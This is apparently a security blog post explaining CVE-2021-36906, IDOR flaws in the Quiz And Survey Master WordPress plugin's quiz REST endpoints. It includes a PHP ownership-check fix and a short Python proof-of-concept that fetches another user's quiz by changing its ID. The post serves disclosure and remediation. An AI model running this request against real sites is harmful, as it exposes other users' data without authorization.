ExpressTech Quiz And Survey Master is a popular WordPress plugin that lets site owners create and manage quizzes and surveys on their websites. Plugin versions 7.3.6 and earlier, however, contain multiple Insecure Direct Object Reference (IDOR) vulnerabilities. In this blog post, we discuss what IDOR vulnerabilities are, how they affect the ExpressTech Quiz And Survey Master plugin, and their potential impact. We also provide a code snippet, links to the original references, and exploit details related to CVE-2021-36906.

What are IDOR Vulnerabilities?
IDOR (Insecure Direct Object References) vulnerabilities occur when an application uses a user-supplied identifier to look up an internal object without checking that the caller is actually authorized to access that object; a malicious user can then reach other users' data simply by changing the identifier. In the context of CVE-2021-36906, multiple IDOR vulnerabilities could allow an attacker to access, modify, or delete other users' quizzes and surveys without the proper permissions.

How can CVE-2021-36906 be exploited?
The insecure direct object reference vulnerabilities were found in the following REST API endpoints of the ExpressTech Quiz And Survey Master plugin:
- GET "/wp-json/qsm/v2/quiz/{quiz_id}"
- POST "/wp-json/qsm/v2/quiz/{quiz_id}"
- DELETE "/wp-json/qsm/v2/quiz/{quiz_id}"

The plugin did not implement sufficient access controls to verify that the requesting user has the necessary permissions to view, modify, or delete the given quiz or survey. An attacker could exploit these vulnerabilities by changing the "{quiz_id}" value in the endpoint path, gaining unauthorized access to other users' quizzes and surveys.
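The missing control is an ownership check on the route's permission_callback. The following is an added example of what that check looks like for a WordPress REST route; it is not the QSM plugin's own code, and the qsm_demo_quiz_author_id() helper, the {prefix}demo_quizzes table and its columns are hypothetical stand-ins for however the plugin records who created a quiz. The same permission_callback would be attached to the POST and DELETE routes.

```php
<?php
// Added example, not the QSM plugin's own code. qsm_demo_quiz_author_id() and
// the {prefix}demo_quizzes table are hypothetical stand-ins for wherever the
// plugin stores the author of a quiz.

function qsm_demo_quiz_author_id( int $quiz_id ): ?int {
    global $wpdb;
    $author = $wpdb->get_var( $wpdb->prepare(
        "SELECT author_id FROM {$wpdb->prefix}demo_quizzes WHERE quiz_id = %d",
        $quiz_id
    ) );
    return null === $author ? null : (int) $author;
}

// The check the vulnerable versions lacked: allow only the quiz owner or a
// user who may manage all quizzes. An unknown quiz_id gets the same answer as
// somebody else's quiz, so the endpoint cannot be used to confirm which IDs exist.
function qsm_demo_quiz_permission( WP_REST_Request $request ) {
    $uid    = get_current_user_id();            // 0 for anonymous callers
    $author = qsm_demo_quiz_author_id( (int) $request['quiz_id'] );
    if ( $uid && null !== $author && $author === $uid ) {
        return true;
    }
    if ( current_user_can( 'manage_options' ) ) {
        return true;
    }
    return new WP_Error(
        'rest_forbidden',
        'You are not allowed to access this quiz.',
        array( 'status' => rest_authorization_required_code() ) // 401 or 403
    );
}

function qsm_demo_read_quiz( WP_REST_Request $request ) {
    global $wpdb;
    $row = $wpdb->get_row( $wpdb->prepare(
        "SELECT quiz_id, quiz_name, author_id FROM {$wpdb->prefix}demo_quizzes WHERE quiz_id = %d",
        (int) $request['quiz_id']
    ), ARRAY_A );
    return $row ? rest_ensure_response( $row )
                : new WP_Error( 'rest_not_found', 'Quiz not found.', array( 'status' => 404 ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'qsm-demo/v1', '/quiz/(?P<quiz_id>\d+)', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'qsm_demo_read_quiz',
        'permission_callback' => 'qsm_demo_quiz_permission', // never leave this out
        'args'                => array( 'quiz_id' => array( 'sanitize_callback' => 'absint' ) ),
    ) );
} );
```

Because the check runs before the callback, the owner test is enforced regardless of how the handler itself is written.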

Code Snippet

The following code snippet shows how an attacker could exploit this vulnerability by sending a GET request to the "/wp-json/qsm/v2/quiz/{quiz_id}" API endpoint, changing "{quiz_id}" to the ID of a target quiz or survey.

import requests

# Base URL of the vulnerable endpoint; the quiz ID is appended to the path.
target_url = "https://example.com/wp-json/qsm/v2/quiz/"
quiz_id = "1"  # Change this value to the target quiz or survey ID

# Session cookie of any logged-in account; the plugin never checked whether
# that account actually owns the requested quiz.
cookies = {'wordpress_logged_in_xxxxx': 'your_cookie_here'}

response = requests.get(target_url + quiz_id, cookies=cookies, timeout=10)

if response.status_code == 200:
    print("Quiz Details: ")
    print(response.json())
else:
    print("Quiz not found or access denied.")

Original References and Exploit Details

The vulnerabilities were initially reported to the WordPress plugin security team by an anonymous security researcher. The public disclosure and details of CVE-2021-36906 can be found at:

CVE-2021-36906 – NVD

Following the public disclosure, the ExpressTech Quiz And Survey Master plugin developers released an updated version (7.3.7) that addresses these vulnerabilities. If you are running a version earlier than 7.3.7, we recommend updating immediately to protect your website from unauthorized access to and misuse of user data.

Conclusion

IDOR vulnerabilities, as demonstrated by CVE-2021-36906, put sensitive information and user data at risk. Developers must enforce proper access controls and validate user-controlled input whenever an identifier from the request is used to select an object. By staying informed about security vulnerabilities and keeping software up to date, users can help protect their websites from such attacks.

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:08:00 UTC